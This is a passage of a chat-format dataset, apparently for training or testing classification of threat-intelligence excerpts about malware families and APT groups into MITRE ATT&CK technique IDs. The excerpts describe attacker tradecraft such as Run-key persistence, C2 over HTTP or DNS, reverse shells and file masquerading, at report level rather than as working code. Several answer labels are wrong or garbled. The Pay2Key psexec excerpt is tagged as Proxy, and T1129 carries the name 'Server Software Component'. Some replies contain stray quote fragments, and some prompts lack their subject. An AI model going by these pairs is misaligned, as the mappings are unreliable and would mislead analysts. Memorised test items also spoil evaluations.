- "content": "T1543.001 - Create or Modify System Process: Launch Agent"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WannaCry uses \"vssadmin\", \"wbadmin\", \"bcdedit\", and \"wmic\" to delete and disable operating system recovery features."
- },
- {
- "role": "assistant",
- "content": "T1490 - Inhibit System Recovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN8 has used HTTPS for command and control."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mongall can identify removable media attached to compromised hosts."
- },
- {
- "role": "assistant",
- "content": "T1120 - Peripheral Device Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has collected data from victims' local systems."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "1) Right after midnight, the attackers connected to a machine on the targeted network most probably via RDP. 3) The attacker used psexec.exe to execute “Cobalt.Client.exe”, which is the Pay2Key ransomware itself, on different machines within the organization"
- },
- {
- "role": "assistant",
- "content": "T1090 - Proxy', 'T1090.001 - Proxy: Internal Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Green Lambert has been disguised as a Growl help file."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some versions of have used the hard-coded string “this is the encrypt key” for Blowfish encryption when communicating with a C2. Later versions have hard-coded keys uniquely for each C2 address."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In order to identify a particular mining session, a file containing the IP address of the machine and the day’s date is created by the idgenerator script and its output is sent to the C&C server by the updater.sh script"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike leads to reconnaissance of an infected host’s environment. In our lab environments, this reconnaissance activity can start within a few minutes after Cobalt Strike traffic first appears."
- },
- {
- "role": "assistant",
- "content": "T1588.001 - Malware', 'T1587.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Squirrelwaffle has relied on victims to click on a malicious link send via phishing campaigns."
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The actor behind Bisonal is clearly motivated and has an interest in Russian, Korean and Japanese victims. The development of Bisonal has been active for more than a decade. However, specific functions are still used today, many years after the original implementation of the Bional malware. Even if Bisonal could be considered as simple with less than 30 functions, it has spent its life targeting sensitive entities in both the public and private sectors. For example, in one campaign they put the domain name of the C2 server in plaintext in the malware which had the function to generate a non-ASCII string for the C2 servers once decoded. In this condition, the malware cannot work on the compromised system. With this investigation and the analysis of this decade of activity, we hope to force this actor to innovate by providing a better understanding of his arsenal and more specifically how Bisonal works"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ComRAT has encrypted and stored its orchestrator code in the Registry as well as a PowerShell script into the WsqmCons Registry key."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NETWIRE has the ability to use \"/bin/bash\" and \"/bin/sh\" to execute commands."
- },
- {
- "role": "assistant",
- "content": "T1059.004 - Command and Scripting Interpreter: Bash"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OilRig has used credential dumping tool named VALUEVAULT to steal credentials from the Windows Credential Manager."
- },
- {
- "role": "assistant",
- "content": "T1555.004 - Credentials from Password Stores: Windows Credential Manager"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The NOKKI payload is written to %LOCALAPPDATA%\\MicroSoft Updatea\\svServiceUpdate.exe prior being executed in a new process. Persistence is achieved by writing the file path to the HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\svstartup registry key."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The January 8 attack used a variant of the ThreeDollars delivery document, which we identified as part of the OilRig toolset based on attacks that occurred in August 2017. Instead, this attack involved delivering the OopsIE Trojan directly to the victim, most likely using a link in a spear phishing email. A New Attack On January 8, 2018, the OilRig threat group sent an email with the subject Beirut Insurance Seminar Invitation to an insurance agency in the Middle East. The OilRig group sent two emails to two different email addresses at the same organization within a six minutes time span. The recipient email addresses suggest they may be the addresses used for specific regional branches of the targeted organization. However, based upon the captured session data, it is highly likely the source email address was spoofed. The email contained an attachment named Seminar-Invitation.doc, which is a malicious Microsoft Word document we track as ThreeDollars. In this case, the ThreeDollars delivery document was not used and instead an attempt was made to deliver the OopsIE Trojan directly to the targeted organization, likely via a link within an email. While this is not a new tactic, this is the first instance where we have observed the OilRig using it in their playbook. As we have observed throughout our tracking of the OilRig group, adopting proven tactics has been a common behavior over time"
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Register as a startup program in HKEY_CURRENT_USER\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run if it has no privileged (Figure 6). Otherwise, it will register itself as a system service (Figure 7"
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly 2.0 used spearphishing with Microsoft Office attachments to target victims."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PlugX can be added as a service to establish persistence. PlugX also has a module to change service configurations as well as start, control, and delete services."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The data exfiltration process runs in the following sequence: The temp.ini files are copied into a text file that matches the pattern"
- },
- {
- "role": "assistant",
- "content": "T1020 - Automated Exfiltration"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tropic Trooper has monitored files' modified time."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Compromise website of strategic importance (e.g. websites visitors have a higher likelihood to be targets of interest) - Add one or more webshell backdoors to victim websites to maintain persistence - Webshell used to add JavaScript developed by OceanLotus into the website - The malicious JavaScript makes calls over HTTP or HTTPS to attacker controlled domains to typically load one of two different OceanLotus frameworks - OceanLotus JavaScript frameworks designed to track, profile, and target the compromised website's visitors - Website visitors of interest are flagged for targeting and receive special JavaScript aimed at compromising the user's system or e-mail accounts"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Reaver collects system information from the victim, including CPU speed, computer name, volume serial number, ANSI code page, OEM code page identifier for the OS, Microsoft Windows version, and memory information."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dipsind uses HTTP for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT37 delivers malware using spearphishing emails with malicious HWP attachments."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN7 created a custom video recording capability that could be used to monitor operations in the victim's environment."
- },
- {
- "role": "assistant",
- "content": "T1125 - Video Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ngrok can be used to proxy connections to machines located behind NAT or firewalls."
- },
- {
- "role": "assistant",
- "content": "T1090 - Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HOPLIGHT has multiple proxy options that mask traffic between the malware and the remote operators."
- },
- {
- "role": "assistant",
- "content": "T1090 - Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "One of the reconnaissance commands was to run a modified nbtscan tool (\"NetBIOS nameserver scanner\") to identify available NetBIOS name servers locally or over the network. Nbtscan has been used by APT10 in Operation Cloud Hopper to search for services of interest across the IT estate and footprint endpoints of interest. It is also capable of identifying system information"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery', 'T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly has used spearphising campaigns to gain access to victims."
- },
- {
- "role": "assistant",
- "content": "T1566 - Phishing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WEBC2 can open an interactive command shell."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowerShell scripts that perform system reconnaissance and credential theft from Windows Credential Manager and then send this information back to Waterbug C&Cs"
- },
- {
- "role": "assistant",
- "content": "T1555.004 - Credentials from Password Stores: Windows Credential Manager"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PROMETHIUM has used Registry run keys to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can retrieve the current content of the user clipboard."
- },
- {
- "role": "assistant",
- "content": "T1115 - Clipboard Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Penquin can encrypt communications using the BlowFish algorithm and a symmetric key exchanged with Diffie Hellman."
- },
- {
- "role": "assistant",
- "content": "T1573.002 - Asymmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Attack overview . Flagpro is used in the initial stage of attacks to investigate target’s environment, download a second stage malware and execute it. Flagpro communicates with a C&C server, and it receives commands to execute from the server, or Flagpro downloads a second stage malware and then executes it. Therefore, Flagpro may have already been used for attacking cases at that point. We call this sample using MFC as “Flagpro v2.0” and old one as “Flagpro v1.0” in this article. Once Flagpro is launched, it communicate with a C&C server and executes the received commands as shown in the above list. If it is not included in both Download Command fields in the command, Flagpro will not execute the main processes such as downloading, executing OS commands, collecting authentication information, and so on. If a Download Command field has “ExecYes”, Flagpro downloads and executes the file. In requesting commands, sending execution results of OS commands or collected authentication information, Flagpro accesses a C&C server with specific URL paths and queries. Following image is an example of the response: Detections . To detect attacks using Flagpro, it is effective to create and install custom signature both on network and endpoint devices. In addition, the investigation commands after Flagpro establishes the connection with the C&C server like following are also useful for detection"
- },
- {
- "role": "assistant",
- "content": "T1069.001 - Permission Groups Discovery: Local Groups"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MuddyWater has used PowerShell for execution."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Silent Librarian has set up auto forwarding rules on compromised e-mail accounts."
- },
- {
- "role": "assistant",
- "content": "T1114.003 - Email Collection: Email Forwarding Rule"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "actors used the following command to rename one of their tools to a benign file name: ren \"%temp%\\upload\" audiodg.exe"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Melcoz can use VBS scripts to execute malicious DLLs."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "While the ports associated with this sample’s configuration pertain normally to HTTP, HTTPS, or DNS, network communication takes place via raw sockets"
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol', 'T1571 - Non-Standard Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RedLeaves can receive and execute commands with cmd.exe. It can also provide a reverse shell."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "gathers volume drive information and system information."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In order to decide which domain xparis() holds, a variable pingadori() uses the radador() function to randomize the domain"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BlackEnergy can gather very specific information about attached USB devices, to include device instance ID and drive geometry."
- },
- {
- "role": "assistant",
- "content": "T1120 - Peripheral Device Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 3: ALFA TEaM Shell v2-Fake Mail (Default) Figure 4 shows an example email containing the default values the shell"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ramsay can collect data from network drives and stage it for exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1039 - Data from Network Shared Drive"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Communication over DNS tunnel with a hardcoded domain name and DGA-generated subdomain - C2 traffic encrypted with RSA-2048 - Custom AES-encrypted storage format used to store configuration, plugins, and harvested data - Unique version number for each sample"
- },
- {
- "role": "assistant",
- "content": "T1071.004 - Application Layer Protocol: DNS', 'T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pony has used scripts to delete itself after execution."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoetRAT has used a custom encryption scheme for communication between scripts and pyminifier to obfuscate scripts."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BOOTRASH is a Volume Boot Record (VBR) bootkit that uses the VBR to maintain persistence."
- },
- {
- "role": "assistant",
- "content": "T1542.003 - Bootkit"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Gamaredon group has been active since at least 2013. Contrary to other APT groups, the Gamaredon group seems to make no effort in trying to stay under the radar. Typical Gamaredon compromise chain . While most of the recent publications have focused on the spearphishing emails together with the downloaders they contain, this blogpost focuses on the post-compromise tools deployed on these systems. Office macro injection module – CodeBuilder . We analyzed different variants of malicious modules used by the Gamaredon group to inject malicious macros or remote templates into documents already present on the compromised system. It then scans for documents with valid Word or Excel file extensions on all drives connected to the system. The most prevalent tools downloaded and installed on compromised machines can be broadly grouped into two different categories: downloaders and backdoors. Backdoors – file stealers . While some variations exist in functionalities, the main purpose of these modules is to enumerate all documents on a compromised system and upload them to the C&C server. The behavior of this module is quite straightforward: it scans the system for new Microsoft Office documents, both on local and removable drives, and uploads them to the C&C server. Quality of execution . We were able to collect numerous different samples of malicious scripts, executables and documents used by the Gamaredon group throughout their campaigns. Conclusion . Despite the simplicity of most of their tools, the Gamaredon group also is capable of deploying some novelty, such as their Outlook VBA module"
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can receive and execute commands with cmd.exe. It can also provide a reverse shell."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "njRAT can launch a command shell interface for executing commands."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses the email platform, Naver, for C2 communications, leveraging SMTP."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ferocious Kitten has named malicious files \"update.exe\" and loaded them into the compromise host's “Public” folder."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Blue Mockingbird has used PowerShell reverse TCP shells to issue interactive commands over a network connection."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It also uses “ActiveXObject” utility to help in its execution through Microsoft products and internet browsers. The ActiveXObject object is used to create instances of OLE Automation objects in Internet Explorer on Windows operating systems. Several applications (Microsoft Office Word, Microsoft Office Excel, Windows Media Player, etc) provide OLE Automation objects to allow communication with them"
- },
- {
- "role": "assistant",
- "content": "T1559.002 - Inter-Process Communication: Dynamic Data Exchange"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DEATHRANSOM is written in C while the other two families are written in C++. DEATHRANSOM uses a distinct series of do/while loops to enumerate through network resources, logical drives, and directories. It also uses QueueUserWorkItem to implement thread pooling for its file encryption threads"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Operation Wocao has spawned a new \"cmd.exe\" process to execute commands."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Nebulae has the ability to delete files and directories."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "But what really makes this backdoor interesting is the way in which it communicates with attackers in order to receive commands. Python/TeleBot abuses the Telegram Bot API from Telegram Messenger to communicate with the attackers. We have informed Telegram of this abuse of their communication platform"
- },
- {
- "role": "assistant",
- "content": "T1102.002 - Bidirectional Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses a custom command and control protocol that communicates over commonly used ports, and is frequently encapsulated by application layer protocols."
- },
- {
- "role": "assistant",
- "content": "T1043 - Commonly Used Port', 'T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Helminth creates folders to store output from batch scripts prior to sending the information to its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FoggyWeb's loader can call the \"load()\" function to load the FoggyWeb dll into an Application Domain on a compromised AD FS server."
- },
- {
- "role": "assistant",
- "content": "T1129 - Server Software Component"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MobileOrder has a command to upload to its C2 server victim browser bookmarks."
- },
- {
- "role": "assistant",
- "content": "T1217 - Browser Bookmark Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "added junk data to outgoing UDP packets to peer implants."
- },
- {
- "role": "assistant",
